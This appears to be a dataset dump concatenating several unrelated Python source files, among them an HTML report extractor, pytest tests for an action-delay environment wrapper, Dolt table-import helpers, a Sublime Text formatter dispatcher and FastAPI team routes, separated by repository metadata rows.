    Combines the extracted title, content, page number, sidebar, and topbar
    into a dict with "page", "module", and "additionalSectionInfo" entries.
    NOTE(review): dig_parent_dir_path and readfile are currently unused here;
    presumably kept for signature symmetry with the other extractors.
    """
    title = extract_page_title(html_strings['reporta_html'])
    content = extract_page_content(html_strings['reportb_html'], current_dir_path)
    page_num = extract_page_number(html_strings['reportc_html'])
    sidebar_info = extract_sidebar(html_strings['sidebar_html'],
                                   current_dir_path,
                                   html_strings['body_page_name'])
    topbar_info = extract_topbar(html_strings['topbar_html'],
                                 current_dir_path,
                                 current_tab_page_name)
    processed = {
        # Per-page data, later keyed by page number in extract_full_module.
        "page": {
            "parentModuleShortTitle": topbar_info['currentModule']['moduleShortName'],
            "pageNum": page_num,
            "pageTitle": title,
            "content": content,
        },
        # Module-level data; identical across all pages of one module.
        "module": {
            "path": topbar_info['currentModule']['path'],
            "shortTitle": topbar_info['currentModule']['moduleShortName'],
            "fullTitle": sidebar_info['currentModuleFullName'],
            "author": sidebar_info['moduleAuthor'],
            "sections": sidebar_info['sections']
        },
        # Used to map sections to page numbers after all pages are processed.
        "additionalSectionInfo": {
            "currentSection": sidebar_info['currentSection'],
            "pageNum": page_num
        }
    }
    return processed
def validate_tab_html_extraction_results(results):
    """Check that every extracted page reports the same parent module.

    Parameters
    ----------
    results : list of dict
        Processed page dicts, each containing a 'module' entry.

    Returns
    -------
    bool
        True when every 'module' entry equals the first one; False (after
        printing each mismatching pair) otherwise.
    """
    baseline_module = results[0]['module']
    no_error = True
    for result in results:
        # `!=` instead of the original `not ... ==` for readability.
        if result['module'] != baseline_module:
            print('Difference in these modules: \n'
                  + str(result['module']) + '\n'
                  + str(baseline_module))
            no_error = False
    return no_error
def extract_full_module(module_file_names, current_dir_path, dig_parent_dir_path, readfile):
    """Extract content from one module in a chapter and store in a dict.
    Returns a dict with "module" (module metadata with per-section page
    numbers filled in) and "pages" (page dicts keyed by page number), or a
    "Failed: ..." error string when validation fails.
    NOTE(review): failures are reported as strings rather than exceptions;
    callers must check the return type.
    """
    extracted = {
        "module": {},
        "pages": {}
    }
    full_current_dir_path = dig_parent_dir_path / ("." + current_dir_path)
    processed_pages = []
    # Extract every tab page belonging to this module.
    for filename in module_file_names:
        tab_html_str = readfile(filename, full_current_dir_path)
        extracted_contents = get_tab_page_html_contents(tab_html_str, current_dir_path,
                                                        dig_parent_dir_path, readfile)
        processed_page = process_tab_html_contents(extracted_contents, filename,
                                                   current_dir_path, dig_parent_dir_path, readfile)
        processed_pages.append(processed_page)
    # All pages of a module must agree on the module-level metadata.
    if not validate_tab_html_extraction_results(processed_pages):
        return "Failed: inconsistency in pages within module " + module_file_names[0]
    # Map each section (identified by path + name) to its page number.
    sectionsToPageNums = {}
    for processed_page in processed_pages:
        sectionInfo = processed_page['additionalSectionInfo']
        pageNumDictKey = (sectionInfo['currentSection']['path']
                          + '-' + sectionInfo['currentSection']['name'])
        if pageNumDictKey in sectionsToPageNums:
            return "Failed: Two sections with the same path + name"
        sectionsToPageNums[pageNumDictKey] = sectionInfo['pageNum']
    extracted['module'] = processed_pages[0]['module']
    # Re-key pages by their page number (removing pageNum from each page).
    for processed_page in processed_pages:
        pageNum = processed_page['page'].pop('pageNum', None)
        extracted['pages'][pageNum] = processed_page['page']
    # Attach page numbers to each section and subsection of the module.
    for section in extracted['module']['sections']:
        section['pageNum'] = sectionsToPageNums[section['path'] + '-' + section['name']]
        if len(section['subsections']) > 0:
            for subsection in section['subsections']:
                subsection['pageNum'] = sectionsToPageNums[subsection['path']
                                                           + '-' + subsection['name']]
    return extracted
def extract_full_chapter(
    all_module_file_names, current_dir_path, dig_parent_path, readfile,
    extract_full_module=None
):
    """Extract an entire chapter by going through all tab*_*.html files.

    Parameters
    ----------
    all_module_file_names : list of str
        Names of all tab*.html / tab*_*.html files in the chapter folder.
    current_dir_path : str
        Directory of the chapter in Posix path format, e.g. "/dig/html/part2".
    dig_parent_path : Path
        Containing directory of the /dig folder as a Path object.
    readfile : function
        Function to read any file based on the file name or folder path.
    extract_full_module : function, optional
        Module extraction function; injectable for testing. Defaults to the
        module-level extract_full_module.

    Returns
    -------
    dict
        Dict with the chapter "path", its "modules", and a page-number-keyed
        "pages" mapping collected from all modules.
    """
    if extract_full_module is None:
        # Late-bind the module-level default; the parameter shadows the
        # global name, so look it up explicitly.
        extract_full_module = globals()['extract_full_module']
    # Sort once so the lowest-numbered modules (and their pages) are
    # discovered and appended first.
    filenames = sorted(all_module_file_names)
    # Files without "_" (tab0.html, tab1.html, ...) start a module.
    module_start_tab_names = [filename for filename in filenames if "_" not in filename]
    extracted = {
        "path": current_dir_path,
        "modules": [],
        "pages": {}
    }
    for tab_name in module_start_tab_names:
        # Bug fix: match the exact module prefix followed by "." or "_".
        # The previous substring test (`"tab1" in filename`) also captured
        # files of e.g. module tab10 when collecting module tab1.
        prefix = tab_name.split('.')[0]
        current_module_file_names = [
            filename for filename in filenames
            if filename == tab_name or filename.startswith(prefix + '_')
        ]
        module_object = extract_full_module(current_module_file_names,
                                            current_dir_path, dig_parent_path, readfile)
        extracted['modules'].append(module_object)
    # Hoist every module's pages into one chapter-level page mapping.
    for module in extracted['modules']:
        pages = module.pop('pages')
        for page_num, page_obj in pages.items():
            extracted['pages'][page_num] = page_obj
    return extracted
def extract_standard_part(part_folder_name, dig_parent_dir, readfile):
    """Extract an entire chapter based on folder name, e.g. /dig/html/part2."""
    # tab*.html / tab*_*.html files (but not tabs*.html) are the starting
    # points for the extraction process.
    dig_parent_path = Path(dig_parent_dir)
    chapter_dir = dig_parent_path / "./dig/html" / part_folder_name
    tab_filenames = [
        entry.name
        for entry in chapter_dir.iterdir()
        if "tab" in entry.name and "tabs" not in entry.name
    ]
    return extract_full_chapter(tab_filenames,
                                "/dig/html/" + part_folder_name,
                                dig_parent_path,
                                readfile)
def reextract_title_page(part_0_data, dig_parent_dir, readfile):
    """Extract the actual title page from part 0 and put it in the dict."""
    split_dir = Path(dig_parent_dir) / "./dig/html/split"
    title_html = readfile("report0b.html", split_dir)
    parsed = BeautifulSoup(title_html, 'html5lib')
    # Keep the first <center> tag's markup verbatim as one paragraph on
    # page "i" (the roman-numeral title page).
    title_paragraph = {
        "type": "paragraph",
        "content": str(parsed.center)
    }
    part_0_data["pages"]["i"]["content"].append(title_paragraph)
    return part_0_data
| 41.27439 | 113 | 0.594032 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,810 | 0.335352 |
17d45564c73f2ece57a82cec5a50edaf47ded893 | 4,096 | py | Python | Pyrado/tests/environment_wrappers/test_action_delay.py | KhanhThiVo/SimuRLacra | fdeaf2059c2ed80ea696f018c29290510b5c4cb9 | [
"DOC",
"Zlib",
"BSD-3-Clause"
] | null | null | null | Pyrado/tests/environment_wrappers/test_action_delay.py | KhanhThiVo/SimuRLacra | fdeaf2059c2ed80ea696f018c29290510b5c4cb9 | [
"DOC",
"Zlib",
"BSD-3-Clause"
] | null | null | null | Pyrado/tests/environment_wrappers/test_action_delay.py | KhanhThiVo/SimuRLacra | fdeaf2059c2ed80ea696f018c29290510b5c4cb9 | [
"DOC",
"Zlib",
"BSD-3-Clause"
] | 1 | 2020-11-24T15:25:26.000Z | 2020-11-24T15:25:26.000Z | # Copyright (c) 2020, Fabio Muratore, Honda Research Institute Europe GmbH, and
# Technical University of Darmstadt.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of Fabio Muratore, Honda Research Institute Europe GmbH,
# or Technical University of Darmstadt, nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL FABIO MURATORE, HONDA RESEARCH INSTITUTE EUROPE GMBH,
# OR TECHNICAL UNIVERSITY OF DARMSTADT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import numpy as np
import pytest
from pyrado.spaces.box import BoxSpace
from pyrado.environment_wrappers.action_delay import ActDelayWrapper
from tests.environment_wrappers.mock_env import MockEnv
@pytest.mark.wrapper
def test_no_delay():
    """With delay=0, actions must be forwarded to the wrapped env unchanged."""
    mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
    wenv = ActDelayWrapper(mockenv, delay=0)
    # Reset to initialize buffer
    wenv.reset()
    # Perform some actions
    wenv.step(np.array([4, 1]))
    assert mockenv.last_act == [4, 1]
    wenv.step(np.array([7, 5]))
    assert mockenv.last_act == [7, 5]
@pytest.mark.wrapper
def test_act_delay():
    """With delay=2, each action must reach the env two steps late.

    The first two applied actions are the buffer's initial zeros.
    """
    mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
    wenv = ActDelayWrapper(mockenv, delay=2)
    # Reset to initialize buffer
    wenv.reset()
    # Perform some actions
    wenv.step(np.array([0, 1]))
    assert mockenv.last_act == [0, 0]
    wenv.step(np.array([2, 4]))
    assert mockenv.last_act == [0, 0]
    wenv.step(np.array([1, 2]))
    assert mockenv.last_act == [0, 1]
    wenv.step(np.array([2, 3]))
    assert mockenv.last_act == [2, 4]
@pytest.mark.wrapper
def test_reset():
    """Resetting the wrapper must clear the delay buffer back to zeros."""
    mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
    wenv = ActDelayWrapper(mockenv, delay=1)
    # Reset to initialize buffer
    wenv.reset()
    # Perform some actions
    wenv.step(np.array([0, 4]))
    assert mockenv.last_act == [0, 0]
    wenv.step(np.array([4, 4]))
    assert mockenv.last_act == [0, 4]
    # The next action would be [4, 4], but now we reset again
    wenv.reset()
    wenv.step(np.array([1, 2]))
    assert mockenv.last_act == [0, 0]
    wenv.step(np.array([2, 3]))
    assert mockenv.last_act == [1, 2]
@pytest.mark.wrapper
def test_domain_param():
    """Setting the act_delay domain parameter must change the buffer length."""
    mockenv = MockEnv(act_space=BoxSpace(-1, 1, shape=(2,)))
    wenv = ActDelayWrapper(mockenv, delay=1)
    # Reset to initialize buffer
    wenv.reset()
    # Perform some actions
    wenv.step(np.array([0, 1]))
    assert mockenv.last_act == [0, 0]
    wenv.step(np.array([2, 4]))
    assert mockenv.last_act == [0, 1]
    # change the delay and reset
    wenv.domain_param = {"act_delay": 2}
    wenv.reset()
    # With delay=2 the first two applied actions are the buffer's zeros.
    wenv.step(np.array([1, 2]))
    assert mockenv.last_act == [0, 0]
    wenv.step(np.array([2, 3]))
    assert mockenv.last_act == [0, 0]
    wenv.step(np.array([8, 9]))
    assert mockenv.last_act == [1, 2]
| 34.711864 | 86 | 0.703125 | 0 | 0 | 0 | 0 | 2,130 | 0.52002 | 0 | 0 | 2,024 | 0.494141 |
17d56bb81bb616a7c2df1a2ead640a65eb1314c9 | 870 | py | Python | firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefs/TESTS/util/stats.py | davewhiiite/uvc | fd45223097eed5a824294db975b3c74aa5f5cc8f | [
"MIT"
] | 1 | 2021-06-12T14:54:07.000Z | 2021-06-12T14:54:07.000Z | firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefsv2/TESTS/util/stats.py | davewhiiite/uvc | fd45223097eed5a824294db975b3c74aa5f5cc8f | [
"MIT"
] | null | null | null | firmware/uvc_controller/mbed-os/features/storage/filesystem/littlefsv2/TESTS/util/stats.py | davewhiiite/uvc | fd45223097eed5a824294db975b3c74aa5f5cc8f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import re
import sys
import subprocess
import os
def main(*args):
    """Wrap the test cases in main.cpp with the test-harness template.

    Reads the raw test code from main.cpp, the (name, description) line
    pairs from template_all_names.txt (stopping at the 'test_results'
    sentinel), and the wrapper skeleton from template_wrapper.fmt, then
    rewrites main.cpp with the wrapped result.

    Parameters
    ----------
    *args
        Unused; accepted so the script tolerates extra command-line
        arguments.
    """
    with open('main.cpp') as file:
        tests = file.read()
    cases = []
    with open('template_all_names.txt') as file:
        while True:
            name = file.readline()
            # Bug fix: also stop at end of file. Previously a names file
            # without a 'test_results' sentinel looped forever, because
            # readline() keeps returning '' at EOF.
            if name == '':
                break
            name = name.strip('\n')
            desc = file.readline().strip('\n')
            if name == 'test_results':
                break
            cases.append((name, desc))
    with open('template_wrapper.fmt') as file:
        template = file.read()
    # One "Case(...)" registration line per extracted (name, desc) pair.
    test_cases = '\n'.join(
        4 * ' ' + 'Case("{desc}", {name}),'.format(name=name, desc=desc)
        for name, desc in cases)
    with open('main.cpp', 'w') as file:
        file.write(template.format(tests=tests, test_cases=test_cases))


if __name__ == "__main__":
    main(*sys.argv[1:])
| 25.588235 | 69 | 0.503448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 155 | 0.178161 |
17d66d7d5e69a7e3bc0a7835bb2e2711e3a0a57c | 6,093 | py | Python | doltpy/cli/write/write.py | jzcruiser/doltpy | e7dfa97c66fa405e1a1ead04228084eaf3c4b0b9 | [
"Apache-2.0"
] | null | null | null | doltpy/cli/write/write.py | jzcruiser/doltpy | e7dfa97c66fa405e1a1ead04228084eaf3c4b0b9 | [
"Apache-2.0"
] | null | null | null | doltpy/cli/write/write.py | jzcruiser/doltpy | e7dfa97c66fa405e1a1ead04228084eaf3c4b0b9 | [
"Apache-2.0"
] | null | null | null | import csv
import datetime
import io
import logging
import os
import tempfile
from typing import Any, Callable, List, Mapping, Optional, Set
import pandas as pd # type: ignore
from doltpy.cli import Dolt
from doltpy.shared.helpers import columns_to_rows
logger = logging.getLogger(__name__)
# Names of the supported `dolt table import` modes.
CREATE, FORCE_CREATE, REPLACE, UPDATE = "create", "force_create", "replace", "update"
# CLI flag(s) passed to `dolt table import` for each mode.
IMPORT_MODES_TO_FLAGS = {
    CREATE: ["-c"],
    FORCE_CREATE: ["-f", "-c"],
    REPLACE: ["-r"],
    UPDATE: ["-u"],
}
def write_file(
    dolt: Dolt,
    table: str,
    file_handle: io.StringIO,
    # TODO what to do about this? NOTE(review): currently unused; the data
    # is always imported as CSV regardless of `filetype`.
    filetype: str = "csv",
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
):
    """Import the contents of an open text handle into a Dolt table.

    :param dolt: Dolt repository object to import into.
    :param table: Name of the target table.
    :param file_handle: Open text handle whose remaining lines are copied
        verbatim into a temporary file and imported.
    :param filetype: Unused (see TODO above).
    :param import_mode: One of create/force_create/replace/update;
        inferred from table existence when omitted.
    :param primary_key: Optional list of primary key column names.
    :param commit: Whether to create a Dolt commit after the import.
    :param commit_message: Message for the commit, if committing.
    :param commit_date: Date for the commit, if committing.
    :return: None
    """
    def writer(filepath: str):
        # Copy the handle's remaining lines into the temp import file.
        with open(filepath, "w") as f:
            f.writelines(file_handle.readlines())
    _import_helper(
        dolt=dolt,
        table=table,
        write_import_file=writer,
        primary_key=primary_key,
        import_mode=import_mode,
        commit=commit,
        commit_message=commit_message,
        commit_date=commit_date,
    )
def write_columns(
    dolt: Dolt,
    table: str,
    columns: Mapping[str, List[Any]],
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
):
    """Import a mapping of column name to column values into a Dolt table.

    :param dolt: Dolt repository object to import into.
    :param table: Name of the target table.
    :param columns: Mapping from column name to that column's values; all
        columns must have the same length.
    :param import_mode: One of create/force_create/replace/update;
        inferred from table existence when omitted.
    :param primary_key: Optional list of primary key column names.
    :param commit: Whether to create a Dolt commit after the import.
    :param commit_message: Message for the commit, if committing.
    :param commit_date: Date for the commit, if committing.
    :return: None
    """
    def writer(filepath: str):
        # Every column must contribute the same number of rows.
        if len({len(column) for column in columns.values()}) != 1:
            raise ValueError("Must pass columns of identical length")
        with open(filepath, "w") as csv_file:
            dict_writer = csv.DictWriter(csv_file, columns.keys())
            dict_writer.writeheader()
            dict_writer.writerows(columns_to_rows(columns))
    _import_helper(
        dolt=dolt,
        table=table,
        write_import_file=writer,
        primary_key=primary_key,
        import_mode=import_mode,
        commit=commit,
        commit_message=commit_message,
        commit_date=commit_date,
    )
def write_rows(
    dolt: Dolt,
    table: str,
    rows: List[dict],
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
):
    """Import a list of row dicts into a Dolt table.

    :param dolt: Dolt repository object to import into.
    :param table: Name of the target table.
    :param rows: List of row dicts; the CSV columns are the union of all
        keys across rows, in first-seen order.
    :param import_mode: One of create/force_create/replace/update;
        inferred from table existence when omitted.
    :param primary_key: Optional list of primary key column names.
    :param commit: Whether to create a Dolt commit after the import.
    :param commit_message: Message for the commit, if committing.
    :param commit_date: Date for the commit, if committing.
    :return: None
    """
    def writer(filepath: str):
        with open(filepath, "w") as f:
            # Bug fix: collect fieldnames in a deterministic (first-seen)
            # order instead of a set, whose iteration order can vary
            # between runs and made the CSV column order unstable.
            fieldnames: List[str] = []
            seen: Set[str] = set()
            for row in rows:
                for key in row.keys():
                    if key not in seen:
                        seen.add(key)
                        fieldnames.append(key)
            csv_writer = csv.DictWriter(f, fieldnames)
            csv_writer.writeheader()
            csv_writer.writerows(rows)
    _import_helper(
        dolt=dolt,
        table=table,
        write_import_file=writer,
        primary_key=primary_key,
        import_mode=import_mode,
        commit=commit,
        commit_message=commit_message,
        commit_date=commit_date,
    )
def write_pandas(
    dolt: Dolt,
    table: str,
    df: pd.DataFrame,
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
):
    """Import a pandas DataFrame into a Dolt table.

    :param dolt: Dolt repository object to import into.
    :param table: Name of the target table.
    :param df: DataFrame to import; rows with missing primary-key values
        are dropped before writing.
    :param import_mode: One of create/force_create/replace/update;
        inferred from table existence when omitted.
    :param primary_key: Optional list of primary key column names.
    :param commit: Whether to create a Dolt commit after the import.
    :param commit_message: Message for the commit, if committing.
    :param commit_date: Date for the commit, if committing.
    :return: None
    """
    def writer(filepath: str):
        # Bug fix: only drop rows with missing key values when a primary
        # key was actually given. Previously dropna(subset=None) dropped
        # every row containing any NaN, silently losing data on keyless
        # imports.
        if primary_key:
            clean = df.dropna(subset=primary_key)
        else:
            clean = df
        clean.to_csv(filepath, index=False)
    _import_helper(
        dolt=dolt,
        table=table,
        write_import_file=writer,
        primary_key=primary_key,
        import_mode=import_mode,
        commit=commit,
        commit_message=commit_message,
        commit_date=commit_date,
    )
def _import_helper(
    dolt: Dolt,
    table: str,
    write_import_file: Callable[[str], None],
    import_mode: Optional[str] = None,
    primary_key: Optional[List[str]] = None,
    commit: Optional[bool] = False,
    commit_message: Optional[str] = None,
    commit_date: Optional[datetime.datetime] = None,
) -> None:
    """Write a temp CSV via `write_import_file` and run `dolt table import`.

    Shared backend for the write_* helpers: resolves the import mode,
    writes the data to a temporary CSV, imports it with the mode's CLI
    flags (plus --pk when a primary key is given), optionally commits,
    and always removes the temporary file.
    """
    import_mode = _get_import_mode_and_flags(dolt, table, import_mode)
    logger.info(f"Importing to table {table} in dolt directory located in {dolt.repo_dir()}, import mode {import_mode}")
    # NOTE(review): tempfile.mktemp only reserves a name and is race-prone;
    # NamedTemporaryFile(delete=False) would be safer.
    fname = tempfile.mktemp(suffix=".csv")
    import_flags = IMPORT_MODES_TO_FLAGS[import_mode]
    try:
        write_import_file(fname)
        args = ["table", "import", table] + import_flags
        if primary_key:
            args += ["--pk={}".format(",".join(primary_key))]
        dolt.execute(args + [fname])
        if commit:
            msg = commit_message or f"Committing write to table {table} in {import_mode} mode"
            dolt.add(table)
            dolt.commit(msg, date=commit_date)
    finally:
        # Always clean up the temporary CSV, even when the import fails.
        if os.path.exists(fname):
            os.remove(fname)
def _get_import_mode_and_flags(dolt: Dolt, table: str, import_mode: Optional[str] = None) -> str:
    """Validate an explicit import mode, or infer one from table existence.

    :param dolt: Dolt repository object, used to check whether the table
        already exists.
    :param table: Name of the target table.
    :param import_mode: Requested mode; must be a key of
        IMPORT_MODES_TO_FLAGS when given.
    :return: The validated or inferred import mode.
    :raises ValueError: If an unknown import mode is passed.
    """
    import_modes = IMPORT_MODES_TO_FLAGS.keys()
    if import_mode is not None:
        if import_mode not in import_modes:
            raise ValueError(f"update_mode must be one of: {import_modes}")
        # Bug fix: a valid explicitly-requested mode was previously
        # discarded and re-inferred from table existence; honor it.
        return import_mode
    # No mode requested: update an existing table, otherwise create it.
    # (Renamed the comprehension variable so it no longer shadows `table`.)
    if table in [existing.name for existing in dolt.ls()]:
        logger.info(f'No import mode specified, table exists, using "{UPDATE}"')
        return UPDATE
    # Bug fix: this log line previously (wrongly) said "table exists".
    logger.info(f'No import mode specified, table does not exist, using "{CREATE}"')
    return CREATE
| 26.84141 | 120 | 0.627934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,098 | 0.180207 |
17d686163c9068a2aa27ba7692b6a6104aee5c2a | 3,816 | py | Python | codeformatter/formatter.py | ephenyxshop/sublimetext-codeformatter | f4af5682b3e28d7ec0b450808bc0c0ad6b017fa9 | [
"MIT"
] | 676 | 2015-01-01T03:56:14.000Z | 2022-03-31T18:20:47.000Z | codeformatter/formatter.py | ephenyxshop/sublimetext-codeformatter | f4af5682b3e28d7ec0b450808bc0c0ad6b017fa9 | [
"MIT"
] | 331 | 2015-01-02T19:31:30.000Z | 2022-03-19T03:24:29.000Z | codeformatter/formatter.py | ephenyxshop/sublimetext-codeformatter | f4af5682b3e28d7ec0b450808bc0c0ad6b017fa9 | [
"MIT"
] | 196 | 2015-01-02T20:48:12.000Z | 2022-03-13T06:48:19.000Z | # @author Avtandil Kikabidze
# @copyright Copyright (c) 2008-2015, Avtandil Kikabidze aka LONGMAN (akalongman@gmail.com)
# @link http://longman.me
# @license The MIT License (MIT)
import os
import sys
import re
import sublime
directory = os.path.dirname(os.path.realpath(__file__))
libs_path = os.path.join(directory, 'lib')
if libs_path not in sys.path:
sys.path.append(libs_path)
try:
# Python 3
from .phpformatter import PhpFormatter
from .jsformatter import JsFormatter
from .htmlformatter import HtmlFormatter
from .cssformatter import CssFormatter
from .scssformatter import ScssFormatter
from .pyformatter import PyFormatter
from .vbscriptformatter import VbscriptFormatter
from .coldfusionformatter import ColdfusionFormatter
from .goformatter import GoFormatter
except (ValueError):
# Python 2
from phpformatter import PhpFormatter
from jsformatter import JsFormatter
from htmlformatter import HtmlFormatter
from cssformatter import CssFormatter
from scssformatter import ScssFormatter
from pyformatter import PyFormatter
from vbscriptformatter import VbscriptFormatter
from coldfusionformatter import ColdfusionFormatter
from goformatter import GoFormatter
class Formatter:
    """Dispatches formatting to the per-language formatter classes.

    Builds a map from syntax name (e.g. "php", "css") to formatter class
    based on the 'syntaxes' entries in CodeFormatter.sublime-settings,
    then routes format requests for the view's detected syntax.
    """
    def __init__(self, view, syntax=None):
        self.platform = sublime.platform()
        # syntax name -> formatter class, built from the settings below.
        self.classmap = {}
        # Sublime Text major version; empty version string means a dev
        # build, treated as ST3.
        self.st_version = 2
        if sublime.version() == '' or int(sublime.version()) > 3000:
            self.st_version = 3
        self.file_name = view.file_name()
        self.settings = sublime.load_settings('CodeFormatter.sublime-settings')
        self.packages_path = sublime.packages_path()
        self.syntax_file = view.settings().get('syntax')
        # Explicit syntax wins; otherwise derive it from the syntax file.
        self.syntax = syntax or self.get_syntax()
        # map of settings names with related class
        map_settings_formatter = [
            ('codeformatter_php_options', PhpFormatter),
            ('codeformatter_js_options', JsFormatter),
            ('codeformatter_css_options', CssFormatter),
            ('codeformatter_html_options', HtmlFormatter),
            ('codeformatter_python_options', PyFormatter),
            ('codeformatter_vbscript_options', VbscriptFormatter),
            ('codeformatter_scss_options', ScssFormatter),
            ('codeformatter_coldfusion_options', ColdfusionFormatter),
            ('codeformatter_go_options', GoFormatter),
        ]
        for name, _class in map_settings_formatter:
            # Each option block lists its syntaxes as a comma-separated str.
            syntaxes = self.settings.get(name, {}).get('syntaxes')
            if not syntaxes or not isinstance(syntaxes, str):
                continue
            for _formatter in syntaxes.split(','):
                self.classmap[_formatter.strip()] = _class
    def format(self, text):
        """Format `text` with the formatter for the current syntax.

        Returns a (stdout, stderr) pair of cleaned strings; any exception
        from the formatter is captured as the stderr string.
        """
        formatter = self.classmap[self.syntax](self)
        try:
            stdout, stderr = formatter.format(text)
        except Exception as e:
            stdout = ''
            stderr = str(e)
        return self.clean(stdout), self.clean(stderr)
    def exists(self):
        """Return True if a formatter is registered for the current syntax."""
        return self.syntax in self.classmap
    def get_syntax(self):
        """Derive the lowercase syntax name from the view's syntax file path."""
        # Matches e.g. "Packages/Python/Python.tmLanguage" -> "Python".
        pattern = re.compile(
            r'Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)')
        m = pattern.search(self.syntax_file)
        found = ''
        if m and len(m.groups()) > 0:
            found = m.groups()[0]
        return found.lower()
    def format_on_save_enabled(self):
        """Return True if format-on-save is enabled for this file's syntax."""
        if not self.exists():
            return False
        formatter = self.classmap[self.syntax](self)
        return formatter.format_on_save_enabled(self.file_name)
    def clean(self, string):
        """Decode bytes (if needed) and normalize line endings to \\n."""
        if hasattr(string, 'decode'):
            string = string.decode('UTF-8', 'ignore')
        return re.sub(r'\r\n|\r', '\n', string)
| 34.071429 | 99 | 0.653826 | 2,517 | 0.659591 | 0 | 0 | 0 | 0 | 0 | 0 | 687 | 0.180031 |
17d69728ccc0d7694c2df558651b0fdf5636b10f | 2,048 | py | Python | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | splash/teams/teams_routes.py | dylanmcreynolds/splash-server | 28559d5109c8efcf3ea882b91a99722d957f2daa | [
"BSD-3-Clause-LBNL"
] | null | null | null | from typing import List, Optional
from attr import dataclass
from fastapi import APIRouter, Security
from fastapi.exceptions import HTTPException
from fastapi import Header
from pydantic import BaseModel
from pydantic.tools import parse_obj_as
from splash.api.auth import get_current_user
from splash.service import SplashMetadata
from splash.service.base import ObjectNotFoundError
from ..users import User
from . import NewTeam, Team
from .teams_service import TeamsService
# Router for all /teams endpoints; mounted by the main FastAPI app.
teams_router = APIRouter()
@dataclass
class Services():
    # Holder for the service singletons used by the route handlers below.
    teams: TeamsService
# Module-level singleton; populated via set_teams_service() at startup.
services = Services(None)
def set_teams_service(svc: TeamsService):
    """Inject the TeamsService instance used by the route handlers."""
    services.teams = svc
class CreateTeamResponse(BaseModel):
    """Response body for team create/update: new uid plus splash metadata."""
    uid: str
    splash_md: SplashMetadata
@teams_router.get("", tags=["teams"], response_model=List[Team])
def read_teams(
        page: int = 1,
        page_size: int = 100,
        current_user: User = Security(get_current_user)):
    """Return a paginated list of teams visible to the current user."""
    results = services.teams.retrieve_multiple(current_user, page=page, page_size=page_size)
    return parse_obj_as(List[Team], list(results))
@teams_router.get("/{uid}", tags=['teams'], response_model=Team)
def read_team(
        uid: str,
        current_user: User = Security(get_current_user)):
    """Return the single team with the given uid."""
    team = services.teams.retrieve_one(current_user, uid)
    return team
@teams_router.post("", tags=['teams'], response_model=CreateTeamResponse)
def create_team(
        team: NewTeam,
        current_user: User = Security(get_current_user)):
    """Create a new team and return its uid and metadata."""
    response = services.teams.create(current_user, team)
    return response
# Bug fix: response_model was previously declared as a *function parameter*
# (where FastAPI treats it as a request parameter); it belongs in the route
# decorator, matching the other endpoints in this module.
@teams_router.put("/{uid}", tags=['teams'], response_model=CreateTeamResponse)
def update_team(uid: str,
                team: NewTeam,
                current_user: User = Security(get_current_user),
                if_match: Optional[str] = Header(None)):
    """Update the team with the given uid.

    Honors the optional If-Match etag header for optimistic concurrency
    and responds with HTTP 404 when the team does not exist.
    """
    try:
        response = services.teams.update(current_user, team, uid, etag=if_match)
    except ObjectNotFoundError:
        raise HTTPException(404)
    return response
| 28.054795 | 92 | 0.70752 | 120 | 0.058594 | 0 | 0 | 1,348 | 0.658203 | 0 | 0 | 48 | 0.023438 |
17d6d2baf1ae470f49b44765fcb69dbd6a4f9357 | 1,635 | py | Python | iotbx/xds/xds_cbf.py | dperl-sol/cctbx_project | b9e390221a2bc4fd00b9122e97c3b79c632c6664 | [
"BSD-3-Clause-LBNL"
